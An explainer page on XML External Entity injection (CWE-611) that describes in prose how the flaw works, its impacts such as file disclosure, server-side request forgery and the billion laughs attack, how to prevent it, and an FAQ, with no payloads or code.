What is XXE (XML External Entity injection)?
Last reviewed June 2, 2026
XXE, or XML External Entity injection (CWE-611), is a vulnerability where an XML parser processes external entity references defined in untrusted XML. An attacker can use these entities to read local files, trigger server-side requests to internal systems, or cause denial of service. The fix is to disable document type definitions and external entity resolution in the parser.
What XXE is
XML External Entity injection happens when an application parses XML that defines external entities and the parser resolves them. XML supports a document type definition, or DTD, that can declare entities. An external entity points to a resource outside the document, such as a file path or a URL.
When a parser is configured to resolve external entities and the XML comes from an untrusted source, an attacker can declare entities that make the parser fetch local files or remote resources, then reflect or leak their contents.
How XXE works
- The application accepts XML from a user, an upload, or an API request and passes it to an XML parser.
- The parser is configured to process DTDs and resolve external entities, which is the unsafe default for some libraries.
- The attacker submits XML that declares an external entity pointing at a local file or an internal URL.
- When the entity is expanded, the parser reads that resource, and its contents may be returned in a response, logged, or used to reach internal services.
Impact of XXE
- File disclosure, where local files such as configuration or credential files are read off the server.
- Server-side request forgery, where the parser is coerced into making requests to internal hosts and cloud metadata endpoints.
- Denial of service, including the billion laughs attack, where nested entity expansion consumes memory and CPU.
- In some configurations, port scanning of internal networks or interaction with other backend services.
How to prevent XXE
- Disable document type definitions entirely in the XML parser, which prevents external and internal entity attacks at the source.
- If DTDs cannot be disabled, explicitly disable external general entities and external parameter entities.
- Use less complex data formats such as JSON where possible and avoid serializing sensitive data into XML.
- Keep XML parsing libraries patched, since safe defaults have improved over time but older versions remain risky.
- Validate and sanitize XML against a known schema and apply server-side controls that limit outbound requests.
Keep exploring
- CWE-611: XML External Entity ReferenceThe Common Weakness Enumeration entry for XXE.
- What is server-side request forgery?A common consequence when XXE coerces internal requests.
- What is the OWASP Top 10?Where XXE sits within widely used risk rankings.
- What is path traversal?Another technique used to read files off a server.
- What is a CWE?How weaknesses like CWE-611 are catalogued.
- CWE directoryBrowse the full Common Weakness Enumeration.
Frequently asked questions
- Where does XXE appear in the OWASP Top 10?
- XXE was its own category in the 2017 OWASP Top 10. In the 2021 list it was folded into the broader Security Misconfiguration category, since unsafe XML parser configuration is the underlying cause.
- What is the billion laughs attack?
- It is a denial-of-service form of XXE that defines a small set of nested internal entities that reference each other. When the parser expands them, the data grows exponentially, exhausting memory and CPU even though the input file is tiny.
- Can XXE happen without returning data to the attacker?
- Yes. Blind XXE occurs when the response does not echo the entity contents. Attackers can still confirm and exploit it through out-of-band techniques such as forcing the parser to make outbound requests they observe elsewhere.
- How is XXE related to server-side request forgery?
- An external entity can point at an internal URL, so the XML parser itself makes the request. This turns XXE into a vector for server-side request forgery, including access to cloud metadata services.
